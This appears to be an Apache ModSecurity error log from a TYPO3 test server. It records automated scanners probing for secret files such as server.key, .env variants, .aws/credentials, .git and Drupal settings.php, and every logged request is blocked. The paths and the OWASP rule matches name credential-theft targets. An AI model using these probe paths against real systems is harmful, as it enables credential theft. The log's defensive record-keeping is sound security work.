[Wed Sep 25 01:34:35.782750 2024] [:error] [pid 2163317] [client 109.202.99.36:55853] [client 109.202.99.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "ZvNMiw9NgSV2FUvQBEvXRQAAAAI"]
[Wed Sep 25 01:34:35.783079 2024] [:error] [pid 2163317] [client 109.202.99.36:55853] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "ZvNMiw9NgSV2FUvQBEvXRQAAAAI"]
[Wed Sep 25 01:34:35.783241 2024] [:error] [pid 2163317] [client 109.202.99.36:55853] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/etc/ssl/private/server.key"] [unique_id "ZvNMiw9NgSV2FUvQBEvXRQAAAAI"]
[Wed Sep 25 01:34:35.789455 2024] [:error] [pid 2163319] [client 109.202.99.36:51027] [client 109.202.99.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/server.key"] [unique_id "ZvNMizi7Hvr15toPaIjbTgAAAAM"]
[Wed Sep 25 01:34:35.789778 2024] [:error] [pid 2163319] [client 109.202.99.36:51027] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/server.key"] [unique_id "ZvNMizi7Hvr15toPaIjbTgAAAAM"]
[Wed Sep 25 01:34:35.789950 2024] [:error] [pid 2163319] [client 109.202.99.36:51027] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/server.key"] [unique_id "ZvNMizi7Hvr15toPaIjbTgAAAAM"]
[Wed Sep 25 01:34:35.798218 2024] [authz_core:error] [pid 2164469] [client 109.202.99.36:42319] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/database.sql
[Wed Sep 25 01:34:35.812153 2024] [authz_core:error] [pid 2163296] [client 109.202.99.36:24875] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yaml
[Wed Sep 25 01:34:35.837031 2024] [authz_core:error] [pid 2163295] [client 109.202.99.36:36087] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Sep 25 22:52:00.776753 2024] [authz_core:error] [pid 2172408] [client 179.43.152.66:56724] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Sep 26 11:01:00.892951 2024] [authz_core:error] [pid 2189422] [client 45.148.10.206:45714] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Sep 26 12:44:51.006999 2024] [authz_core:error] [pid 2189423] [client 154.216.17.66:38186] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Sep 26 16:38:51.711641 2024] [:error] [pid 2189618] [client 82.223.29.42:51764] [client 82.223.29.42] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZvVx-y1QBgW2RvVYMpi3LgAAAAY"]
[Thu Sep 26 16:38:51.712319 2024] [:error] [pid 2189618] [client 82.223.29.42:51764] [client 82.223.29.42] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZvVx-y1QBgW2RvVYMpi3LgAAAAY"]
[Thu Sep 26 16:38:51.712905 2024] [:error] [pid 2189618] [client 82.223.29.42:51764] [client 82.223.29.42] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZvVx-y1QBgW2RvVYMpi3LgAAAAY"]
[Fri Sep 27 12:06:02.534003 2024] [:error] [pid 2220631] [client 179.43.149.114:47762] [client 179.43.149.114] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZvaDigfynEfQUYCGleyvTwAAAAQ"]
[Fri Sep 27 12:06:02.534666 2024] [:error] [pid 2220631] [client 179.43.149.114:47762] [client 179.43.149.114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZvaDigfynEfQUYCGleyvTwAAAAQ"]
[Fri Sep 27 12:06:02.535086 2024] [:error] [pid 2220631] [client 179.43.149.114:47762] [client 179.43.149.114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZvaDigfynEfQUYCGleyvTwAAAAQ"]
[Fri Sep 27 12:06:02.601563 2024] [:error] [pid 2220634] [client 179.43.149.114:47778] [client 179.43.149.114] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.exemple"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.exemple"] [unique_id "ZvaDiqOZqKgv1RDUbyXDVQAAAAU"]
[Fri Sep 27 12:06:02.602185 2024] [:error] [pid 2220634] [client 179.43.149.114:47778] [client 179.43.149.114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.exemple"] [unique_id "ZvaDiqOZqKgv1RDUbyXDVQAAAAU"]
[Fri Sep 27 12:06:02.602785 2024] [:error] [pid 2220634] [client 179.43.149.114:47778] [client 179.43.149.114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.exemple"] [unique_id "ZvaDiqOZqKgv1RDUbyXDVQAAAAU"]
[Fri Sep 27 12:06:02.649247 2024] [:error] [pid 2220630] [client 179.43.149.114:47784] [client 179.43.149.114] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_exemple"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_exemple"] [unique_id "ZvaDigtWBOH9tdxCdHXl7QAAAAM"]
[Fri Sep 27 12:06:02.649728 2024] [:error] [pid 2220630] [client 179.43.149.114:47784] [client 179.43.149.114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_exemple"] [unique_id "ZvaDigtWBOH9tdxCdHXl7QAAAAM"]
[Fri Sep 27 12:06:02.650176 2024] [:error] [pid 2220630] [client 179.43.149.114:47784] [client 179.43.149.114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_exemple"] [unique_id "ZvaDigtWBOH9tdxCdHXl7QAAAAM"]
[Fri Sep 27 12:06:03.052102 2024] [:error] [pid 2220629] [client 179.43.149.114:47806] [client 179.43.149.114] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "ZvaDi3mie-vBelsjsuflbQAAAAI"]
[Fri Sep 27 12:06:03.052610 2024] [:error] [pid 2220629] [client 179.43.149.114:47806] [client 179.43.149.114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "ZvaDi3mie-vBelsjsuflbQAAAAI"]
[Fri Sep 27 12:06:03.053055 2024] [:error] [pid 2220629] [client 179.43.149.114:47806] [client 179.43.149.114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "ZvaDi3mie-vBelsjsuflbQAAAAI"]
[Sat Sep 28 16:15:17.420040 2024] [authz_core:error] [pid 2249662] [client 195.178.110.21:53610] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Sep 28 19:27:47.698094 2024] [authz_core:error] [pid 2249650] [client 45.135.232.70:55342] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Sat Sep 28 19:27:47.819490 2024] [authz_core:error] [pid 2249675] [client 45.135.232.70:55368] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/ansible
[Sat Sep 28 19:27:47.836777 2024] [authz_core:error] [pid 2249667] [client 45.135.232.70:55348] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/ansible
[Sat Sep 28 19:27:47.839845 2024] [authz_core:error] [pid 2249654] [client 45.135.232.70:55362] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/ansible
[Sat Sep 28 19:27:47.843246 2024] [:error] [pid 2249668] [client 45.135.232.70:55358] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v1/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v1/config/.env"] [unique_id "Zvg8k6BqJNrqFhpfIKQISQAAAAs"]
[Sat Sep 28 19:27:47.843494 2024] [:error] [pid 2249668] [client 45.135.232.70:55358] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v1/config/.env"] [unique_id "Zvg8k6BqJNrqFhpfIKQISQAAAAs"]
[Sat Sep 28 19:27:47.843648 2024] [:error] [pid 2249668] [client 45.135.232.70:55358] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v1/config/.env"] [unique_id "Zvg8k6BqJNrqFhpfIKQISQAAAAs"]
[Sat Sep 28 19:27:47.845944 2024] [authz_core:error] [pid 2249643] [client 45.135.232.70:55360] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Sat Sep 28 19:27:47.848167 2024] [:error] [pid 2249653] [client 45.135.232.70:55378] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/user/v1/secrets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/user/v1/secrets/.env"] [unique_id "Zvg8k0aN42JCUVKnn4KGUQAAAAY"]
[Sat Sep 28 19:27:47.848587 2024] [:error] [pid 2249653] [client 45.135.232.70:55378] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/user/v1/secrets/.env"] [unique_id "Zvg8k0aN42JCUVKnn4KGUQAAAAY"]
[Sat Sep 28 19:27:47.848831 2024] [:error] [pid 2249653] [client 45.135.232.70:55378] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/user/v1/secrets/.env"] [unique_id "Zvg8k0aN42JCUVKnn4KGUQAAAAY"]
[Sat Sep 28 19:27:47.861184 2024] [authz_core:error] [pid 2249684] [client 45.135.232.70:55416] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Sat Sep 28 19:27:47.889463 2024] [authz_core:error] [pid 2249650] [client 45.135.232.70:55432] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.gitlab-ci.yml
[Sat Sep 28 19:27:47.915560 2024] [:error] [pid 2249675] [client 45.135.232.70:55434] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v2/user/secrets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v2/user/secrets/.env"] [unique_id "Zvg8kxj1bG4ic-iMijmOeAAAAAw"]
[Sat Sep 28 19:27:47.915893 2024] [:error] [pid 2249675] [client 45.135.232.70:55434] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v2/user/secrets/.env"] [unique_id "Zvg8kxj1bG4ic-iMijmOeAAAAAw"]
[Sat Sep 28 19:27:47.916093 2024] [:error] [pid 2249675] [client 45.135.232.70:55434] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v2/user/secrets/.env"] [unique_id "Zvg8kxj1bG4ic-iMijmOeAAAAAw"]
[Sat Sep 28 19:27:47.952422 2024] [authz_core:error] [pid 2249643] [client 45.135.232.70:55486] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/cloudformation
[Sat Sep 28 19:27:48.010446 2024] [:error] [pid 2249675] [client 45.135.232.70:55582] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /drupal/sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/drupal/sites/default/settings.php"] [unique_id "Zvg8lBj1bG4ic-iMijmOeQAAAAw"]
[Sat Sep 28 19:27:48.010694 2024] [:error] [pid 2249675] [client 45.135.232.70:55582] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/drupal/sites/default/settings.php"] [unique_id "Zvg8lBj1bG4ic-iMijmOeQAAAAw"]
[Sat Sep 28 19:27:48.010882 2024] [:error] [pid 2249675] [client 45.135.232.70:55582] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/drupal/sites/default/settings.php"] [unique_id "Zvg8lBj1bG4ic-iMijmOeQAAAAw"]
[Sat Sep 28 19:27:48.094337 2024] [authz_core:error] [pid 2249653] [client 45.135.232.70:55694] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/kubernetes
[Sat Sep 28 19:27:48.111204 2024] [authz_core:error] [pid 2249675] [client 45.135.232.70:55506] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/circleci
[Sat Sep 28 19:27:48.118056 2024] [authz_core:error] [pid 2249684] [client 45.135.232.70:55736] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/kubernetes
[Sat Sep 28 19:27:48.134426 2024] [:error] [pid 2261889] [client 45.135.232.70:55566] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /drupal/sites/default/files/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/drupal/sites/default/files/.env"] [unique_id "Zvg8lFqeHCRD_JMeF92BOwAAAAA"]
